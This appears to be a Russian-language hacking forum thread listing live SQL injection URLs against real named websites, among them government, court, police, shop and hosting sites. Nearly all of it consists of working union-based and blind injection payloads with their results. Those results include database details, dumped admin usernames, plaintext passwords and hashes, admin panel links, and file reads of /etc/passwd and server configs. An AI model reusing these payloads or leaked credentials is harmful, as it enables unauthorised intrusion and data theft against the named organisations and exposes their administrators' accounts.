http://www.heaven-house.kz/index.php?part=catalogue&item_type_id=10+union+select+1,2,3,table_name,5,6, 7,8,9,10,11,12,13,14,15,16,17+from+information_sch ema.tables+--+

www.oprf.ru - ОБЩЕСТВЕННАЯ ПАЛАТА РФ=) Не думал что на таких сайтах могут быть уязвимости=)

http://www.oprf.ru/ru/press/conference/101+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8+--+
юзер - oprf@localhost
бд - oprf
версия MySQL - 5.0.45

выводим список всех админов с пассами)
http://www.oprf.ru/ru/press/conference/101+UNION+SELECT+1,2,3,4,group_concat(pwd,0x3a,log in),6,7,8+from+users+--+
логин главного админа - root пароль - abra
админка - http://www.oprf.ru/admin/

p.s Не злоупотреблять=)

jokester: я так и буду твои посты объединять?

http://www.defineyourgod.com/god.php?id=69+union+select+1,version(),3,4,5,6,7,8 ,9,10,11--
5.0.51a-15
http://www.defineyourgod.com/god.php?id=69+union+select+1,table_name,3,4,5,6,7, 8,9,10,11+from+information_schema.tables+limit+18, 1--

http://www.solaren.ro/product.php?id=2&sectionID=57+UNION+SELECT+1,2,3,4,5,6,7,8,AES_DECR YPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database( ),User()),0x71),0x71)+LIMIT+1,1--



Database Version: 5.0.67-community
Database name: solarenr_1
User name: solarenr_1@localhost

lookingglass.org
http://www.lookingglass.org/links/index.php?cat_id=-77+UNION+SELECT+concat_ws(0x3a,version(),database( ),user())--


PR7
5.0.67-community
looking_publications
looking_ttlgadmi@localhost
Есть доступ к INFORMATION_SCHEMA можем смотреть названия таблиц и так далее =)

http://www.bellagreetings.com/1/card.php?ID=-1135'+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17/*
4.1.20

http://www.evergreenmarketing.com/card.php?ID=-55'+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
4.1.22

http://mer.e-kazan.ru Сайт мэра города Казани=)

юзер:
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),1,1)))='1 09 = m
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),2,1)))='1 01 = e
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),3,1)))='1 14 = r
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),4,1)))='6 4 = @
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),5,1)))='1 08 = l
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),6,1)))='1 11 = o
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),7,1)))='9 9 = c
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),8,1)))='9 7 = a
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),9,1)))='1 08 = l
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),10,1)))=' 104 = h
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),11,1)))=' 111 = o
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),12,1)))=' 115 = s
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),13,1)))=' 116 = t
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),14,1)))=' 0

бд:
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),1,1)) )='109 = m
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),2,1)) )='101 = e
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),3,1)) )='114 = r
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),4,1)) )='0

версия MySQL - 5:
http://mer.e-kazan.ru/rus/events'+and+substring(version(),1,1)='5

p.s. через information_shema можно вывести все таблицы, но к сожалению на сайте base авторизация ='(

какой то шоп:
http://www.ptpworld.es/index.php?menu=adorder&adid=-1+union+select+1,2,group_concat(concat_ws(0x3a,use rname,password,email)),4+from+users--
------------------------------------------------------------------
http://www.nashvilleindian.com/yellowpages1.php?id=-394+union+select+1,2,3,concat(0x3a,emailid,passwor d),5,6,7,8,9,10,11,12,13,14+from+users--

получаем не малое количество юзеров...
------------------------------------------------------------------
Хостинг
http://www.bigfatwebhosting.co.uk/help/index.php?view=-1+union+select+1,concat(0x3a,user,pass),3,4,5,6+fr om+admin--
логин/пасс:
mikeyj69:RPmjbf69XYz4
-------------------------------------------------------------
The End!

weissenborn.es
http://www.weissenborn.es/cubecart/index.php?cat_id=-3+UNION+SELECT+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6,7,8--

PR4
4.1.22-standard
eweissen_ccrt1
eweissen_ccrt1@localhost

Вобщем этот шоп построен на CubeCart =) такой же еще один нашел...
www.fontwerks.com
Только тут названия таблиц и полей читать можно из INFORMATION_SCHEMA...

rugbycanada.ca
http://www.rugbycanada.ca/index.php?lang=en&page_id=10&news_id=-4464+UNION+SELECT+1,concat_ws(0x3a,version(),datab ase(),user
()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

PR7
Version:4.0.27
DB:rugbyca
user:rugbyca@localhost

Так же можем прочитать логин и пароль админа:
http://www.rugbycanada.ca/index.php?lang=en&page_id=10&news_id=-4464+UNION+SELECT+1,concat_ws
(0x3a,id,user_name,user_password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19+FROM+administrators/*
Только как-то пароль странно вывел или с солью или не понятно вообще что это =)
1:rugbyca:0f9c80a8014a66940ce454df4fcac581:b2

vkazan.ru

юзер:
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,1,1)))=112 = p
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,2,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,3,1)))=119 = w
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,4,1)))=101 = e
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,5,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,6,1)))=95 = _
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,7,1)))=103 = g
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,8,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,9,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,10,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,11,1)))=100 = d
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,12,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,13,1)))=64 = @
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,14,1)))=108 = l
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,15,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,16,1)))=99 = c
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,17,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,18,1)))=108 = l
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,19,1)))=104 = h
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,20,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,21,1)))=115 = s
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,22,1)))=116 = t
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,23,1)))=0

бд:
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),1,1)))=112 = p
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),2,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),3,1)))=119 = w
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),4,1)))=101 = e
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),5,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),6,1)))=95 = _
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),7,1)))=103 = g
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),8,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),9,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),10,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),11,1)))=100 = d
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),12,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),13,1)))=0

версия MySQL - 5
http://vkazan.ru/city/sights/index.html?id=560+and+(substring(version(),1,1))=5

p.s. нет выводимых полей, опять пришлось через подзапросы все делать=)

commencementflowers.com - PR3
http://www.commencementflowers.com/flowers_catalog/index.php?id=fuck%27+UNION+SELECT+concat_ws(0x3a,v ersion(),user(),database())/*Version: 4.0.24-standard-log
User: convflow@10.105.0.6
DB name: convflow

Админка:
http://www.commencementflowers.com/flowers_catalog/admin/Но к сожалению или к счастью basic авторизация =)

http://www.birdsinbulgaria.org/news.php?id=-1+union+select+1,concat_ ws(0x 3a,version(),data base(),user()),3,4,5,6--

Database Version: 5.0.51
Database name: birdsinbulgaria
User name:birdsinbulgaria@localhost

http://www.eotepic.org/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,vers ion(),database(),user ()),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--

Database Version: 5.0.67
Database name: eot_pacibirdsinbulgaria
User name: eot-web2@hemlock.ncsa.uiuc.edu

http://www.ecazari.ro/cazare/index.php?pid=-1531+UNION+SELECT+concat_ws(0x3a,version(),databas e(),user()),2--%20&user=det


Database Version: 4.1.22-standard-log
Database name: rent4all_cazari
User name: rent4all_cazari@localhost


http://www.ecazari.ro/cazare/index.php?pid=-1531+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT _WS(0x3a,email,id,name,password,user),0x71),0x71)+ FROM+admin+LIMIT+0,1-- &user=det

::1::e7f7c6d0dd34536e5ad587c201ba7aef:admin

pass cracked by OMG xteog300

http://www.thrashermagazine.com/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char( 58),password,char(58),email),3,4,5,6,7,8,9,0,11,12 ,13,14,15,16,17,18,19,20+from+jos_users--%20%20

http://www.slapmagazine.com/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char( 58),password,char(58), email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19, 20+from+jos_users--

http://www.leaguexbox.fr - PR: 4

http://www.leaguexbox.fr/main_pages/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),datab ase(),user()) ,5,6,7,8, 9,10,11,12,13,14--

Database Version : 5.0.44
Database name : leaguexb
User name : leaguexb@localhost

http://www.bellarosa.by/guest.php?PagID=-999999+union+select+1,user(),version(),database(), concat_ws(0x3a,LOGIN,PASS)+from+br_users/*

http://www.erachicco.ro/products.php?pid=36[SQL]&pager=9

Version : 4.1.22-standard-log
DataBase:erachico_erachicco
User: erachico@localhost

wol.bz - бесплатный хостинг=)
http://wol.bz/cgi-bin/view.pl?a=list&sid=&l=1&idr=-c10'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conca t_ws(0x3a,user(),database(),version()),14,15,16,17 ,18,19,20,21+--+
юзер - postcards@192.168.1.15
бд - constructor_new
версия MySQL - 4.0.25-standard

http://www.cantus.hr/infonaslova.php?id=-36+union+select+1,2,3,4,5,concat_ws(iduser,0x3a,pa sswd),7+from+admin+limit+1,1
http://www.cantus.hr/admin/ - админка
Логин и пароль - vlasta
http://www.jk-meridijan.hr/article.php?id=-36+union+select+1,2,3,4,login,password,7,8,9,10,11 ,12+from+users+limit+1,1

http://www.paradigmmgmt.com/artist_detail.php?id=-1+union+select+1,2,3,concat_ ws(0 x3a,version(),database (),user()),5,6,7,8--

Database Version : 5.0.67
Database name : paradig3_db
User name : paradig3_user@localhost

http://www.computersworth.com/item.cfm?id=32%20or%201=@@version--


Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)


http://www.computersworth.com/item.cfm?id=32%20or%201=(select%20system_user)--


ccs2a

http://www.computersworth.com/item.cfm?id=32%20or%201=(select%20db_name())--

scCommerce_computersworth



http://www.14kofginafpd.com/items.php?id=1970987098708/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a,version(),user(),databa se()),8,9--


Database Version: 5.1.30
Database name: gamepile_14kofginafpd
User name: gamepile_webuser@localhost


Питорасики -)))

http://phillygaycalendar.com/pages/video.php?id=57987969876543+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10--



Version:4.0.27-max-log
User:mccann76@68.178.211.7
Database:mccann76



http://mayberryfineart.com/page.php?op=artist&id=5809780896798653+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3 a,version(),user(),database()),23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40--

Database Version:4.0.27-standard
User name:maybs_mfadb@localhost
Database name:maybs_claire


ASP С мускулом!

http://www.elcaandy.org/archivearticle.asp?id=-53+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9--


Database Version:4.0.24-nt-max
User name:internetadmin@DEDI408
Database name:standrew

PageRank 6

http://rothburyfestival.com/festival/artists.php?id=57890709780973+union+select+concat_ ws(0x3a,version(),user(),database())--


Database Version: 5.1.11-beta
Database name: rothbury
User name: web.rbf@localhost


Вывод на картиночке =)


http://www.citric.cat/noticia.php?id=6809709768+union+select+concat_ws(0 x3a,version(),user(),database()),2--&grup=do-ce

Version:4.1.25-Debian_mt1
User:citric@72.47.224.15
Database:citric_es

http://www.spiderproject.ro/ro/noutati.php?art=-39+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10

Database Version: 5.0.67-community-log
Database name: spiderpr_1
User name: spiderpr_1@localhost


З.Ы. особо дорог сей сайт тем , что его главный директор а именно http://www.spiderproject.ro/ro/echipa.php преподовал мне енту тему 1 год, екзамен сдал на ура, так как был единственным рускоязычным студентом в группе...а данная програма русская разработка :)

http://www.srosolutions.net/srosolution.php?id=5708609650843+union+select+1,2, 3,concat_ws(0x3a,version(),user(),database()),5,6--


Database Version: 5.0.67-msl-icd1-log
Database name: srosolutions_cms
User name: srosolutions@s401.sureserver.com




http://www.srosolutions.net/srosolution.php?id=5708609650843+UNION+SELECT+1,2, 3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONC AT(username,0x3a,password)+FROM+srosolutions_cms.s ysadmin+LIMIT+1,1),0x3a),0x71),0x71),5,6--


Fields username:password

: admin : cantona1996

http://kormos.ro/index.php?lg=en&produse&pid=2[SQL]



Version: 5.0.67-community
DataBase: kormos_kormos
User: kormos_kormos@localhost

www.kormos.ro/admin

http://www.freedomszone.com/aggregator.php?id=809809757093+union+select+1,conc at_ws(0x3a,version(),user(),database()),3--

Version:4.0.27-standard
User:freedoms_freedom@localhost
Database:freedoms_freefeed


http://www.spoonloads.com/section.php?what=News&id=18098097064+union+select+1,2,concat_ws(0x3a,ver sion(),user(),database()),4,5,6,7--


Version:4.1.22-standard-log
User:spoono_db@localhost
Database:spoono_sections

http://www.structural-project.ro/page.php?pid=-18+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS( 0x3a,Version(),Database(),User()),0x71),0x71),2,3, 4,5,6/*


Database Version: 4.1.11-log
Database name: structural
User name: project@ns3.opticnet.ro

id,password,usr
1:Razvan Ioan:3e21ab
62fb17400301d9f0156b6c3031:razvanioan
1:Niculina Tutu:3bcdff0b24ffe7eaeb6ed4966852c31f:nicktutu
1:Admin:39b508932796a4c883b56bfc20e96054:StructPro ject

www.structural-project.ro/admin

http://www.digitalvision.ro/index.php?modp=sas&sid=-251301462+UNION+SELECT+1,2,3,concat_ws(0x3a,versio n(),database(),user()),5,6/*&prord=ASC



Database Version: 5.0.48
Database name: digitalvision_ro
User name: dv_ro_miniuser@localhost


http://www.digitalvision.ro/admin.php

6898262ba962c9fe79fb3d5a057c8d75

http://www.pdn.dkp.go.id/index.php?mod=modules/prd02.php&no=-31%20union%20select%201,2,3,4,concat_ws(0x3a,user, password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29%20from%20login--

И вот содержимое таблицы Login

NIP,user,unit,level,org,time_login,time_logout,sta tus,psw,login_id,sessionid,userid,von,bis,status,s ite,UserID,UserPass,NamaUser,Level,Unker,no,user,p assword,level,no,user,password,level,no,user,passw ord,level

http://matrimoniale.oltenia.ro/trimite-14354[SQL].html


Version : 5.0.22-log
Database: matrimoniale
User : dassaev@localhost

http://www.amazighworld.org/news/index_show.php?id=-1+union+select+1,concat_ ws(0 x3a,version(),database(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15--

Database Version : 4.0.24_Debian
Database name : amazighworld_org
User name : amazighworld_org@localhost

kusa.ca PR5
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws( 0x3a,version(),user(),database()),5,6,7,8,9,10,11, 12,13/*
DBVer:4.1.20
User: root@localhost << Вот это я вообще не ожидал увидить, но это ладно! =) самое интересное еще впереди!!
DBName:desar01_cms

Работает чтение файлов...
/etc/passwd
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE( 'etc/passwd'),5,6,7,8,9,10,11,12,13/*
/etc/httpd/conf/httpd.conf(от сюда видно, что кроме уязвимого есть на этом сервере еще несколько сайтов)
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE( 'etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/*Теперь посмотрим что за пользователи...http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws( 0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mys ql.user/* И тут оказывается что на root вообще нет пароля =))) Этому я нашел подтверждение, прочитав конфиг от местного форума:http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE( '/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/*
=)

http://emap.fm/ondemandpart.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),use r()),5,6, 7,8,9,10,11--

Database Version : 5.0.32 - Debian
Database name : emapfm
User name : emapfm@localhost

http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws( 0x3a,version(),database (),user()),13,14--

Database Version : 5.0.67
Database name : cms_admin
User name : root@localhost

берём админа:

http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws(0 x3a,user,password ),13,14+from+my sql.user+limit+0,1--

root:*31ECFA8D11EDEEB33BF4045DB0D8E5E158FD4A84 - пасс не расшифровал :(

http://sterlitamak.ru/arxnews.shtml?id=-880+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10/*

version: 4.0.24_Debian-10sarge2-log
user:adminstr@localhost
database:adminstr

tatsud.ru ВЕРХОВНЫЙ СУД РЕСПУБЛИКИ ТАТАРСТАН=)))

http://tatsud.ru/index.php?link=news.php&month=-3/**/union/**/select/**/1,2,concat_ws(0x3a,Version(),Database(),User()),4+--+

юзер - tatsud@localhost
БД - BDSUD
версия MySQL - 5.0.66a
P.s. дальше копаться совесть не позволила=))

abbypd.ca - PR5 - ABBOTSFORD POLICE DEPARTMENT =))) звоним 911 =)
MySQL Ver: 4.1.22
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(ve rsion(),1,1)))=52 -> 4(ветка)
Я провел до конца брут и выяснил какой же точно версии...
User : apd@localhost
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),1,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),2,1)))=112 -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),3,1)))=100 -> d
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),4,1)))=64 -> @
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),5,1)))=108 -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),6,1)))=111 -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),7,1)))=99 -> c
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),8,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),9,1)))=108 -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),10,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),11,1)))=111 -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),12,1)))=115 -> s
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(us er(),13,1)))=116 -> t
DB : hh_apd
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(da tabase(),1,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(da tabase(),2,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(da tabase(),3,1)))=95 -> _
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(da tabase(),4,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(da tabase(),5,1)))=112 -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(da tabase(),6,1)))=100 -> d
Еще один клиент... на том же хостинге.. =\
tourismabbotsford.ca - PR5
Уязвимость в:
http://www.tourismabbotsford.ca/index.php?page_id=291
MySQL Ver: 4.1.22
User : tourism@localhost
DB : hh_tourism

http://www.tv.myzone.ro/index.php?mid=13[SQL]


Version :5.0.45-log
Database: avatarul_tvmyzone
User: avatarul_razvan@192.168.124.2



blind sql...bruted

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),1,1) )=102 f

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),2,1) )=116 t

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),3,1) )=101 e

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),4,1) )=64 @

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),5,1) )=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),6,1) )=57 9

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),7,1) )=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),8,1) )=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),9,1) )=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),10,1 ))=54 6

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),11,1 ))=56 8

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),12,1 ))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),13,1 ))=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),14,1 ))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),15,1 ))=51 3

fte@192.168.1.3


***********************

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 ,1))=53 5

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2 ,1))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),3 ,1))=48 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),4 ,1))=46 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),5 ,1))=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),6 ,1))=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),7 ,1))=45 -

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),8 ,1))=68 D

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),9 ,1))=101 e

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 0,1))=98 b

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 1,1))=105 i

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 2,1))=97 a

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 3,1))=110 n

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 4,1))=95 _

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 5,1))=48 0

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 6,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 7,1))=98 b

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 8,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1 9,1))=110 n

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2 0,1))=116 t

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2 1,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2 2,1))=54 6


5.2122
PS надоело)

http://www.bmxmagazin.ro/index.php?ref=2&categ1=-33+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7--



Database Version: 5.0.75-log
Database name: bmxmagazin_website
User name: bmxmagazin@localhost



всё сложнее найти скули в домене ро, но от этого факта мне еще интересне

всё сложнее найти скули в домене ро, но от этого факта мне еще интересне

вот тебе

Contemporary Romanian Writers
http://www.romanianwriters.ro/book.php?id=-9+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database())--
user(): romanian_svc@localhost
database(): romanian_svc 2
version(): 5.0.67-community

http://www.starmall.ro/magazin/?c=8&s=-34+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7

Version : 5.0.67-community
Database : starmall_db
User :starmall_star@localhost


я не говорил невозможно.....

Какой то самопальный двиг(PageRank: 4 тИЦ: 200):

http://absolutist.ru/admin/generation/gen.game_float.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat_ws(0x3A,user(),@@version,da tabase()),22,23,24,25,26,27,28,29,30&pid=-1

takafol.ru

http://takafol.ru/news.php?g=0+union+select+1,2,concat_ws(0x3a,user( ),version(),database()),4,5,6+--+;&page=5
юзер - takafol@localhost
бд - db_takafol
версия mysql - 4.0.23-standard

http://www.copycomputer.ro/index.php?ref=12&id=237+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a ,version(),database(),user()),10,11,12,13,14,15--


Database Version: 5.0.67-community
Database name: copycomp_MySql
User name: copycomp@localhost


На сегодня все,спокойной ночи всем.

Книжный магазин
http://book.xadi.net/index.php?book=-19475%20union%20select%201,2,concat_ws(0x3a,versio n(),database(),user()),4,5,6,7,8,9,10,11%20--
version::4.1.22-max
user::xadinet_xadi@localhost
database::xadinet_db

http://www.godwinart.com/two.php?id=-1194+union+select+1,version(),3,4,5,6,7,8--

5.0.67-community

немного искусства..

Федеральное Радио

http://www.federalnewsradio.com/index.php/www.defenselink.mil/mtom/index.php?nid=84&sid=-1433980+union+select+1,version()/*

version::5.0.32-Debian_7etch5-log
user::informant@64.147.130.217
database::tags

http://www.ps2modchip.com.br/two.php?flag=noticias&id=-6+union+select+1,version(),3,4,5/*

4.0.27-locaweb-log

http://www.parceiraagronegocios.com.br/two.php?flag=informativo&id=-2+union+select+1,version(),3--

5.0.67-community

www.pulse-of-reason.ru Сайт какой-то Казанской рок-группы)

находим таблицу с админами:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),1,1))='112 = p
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),2,1))='117 = u
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),3,1))='108 = l
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),4,1))='115 = s
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),5,1))='101 = e
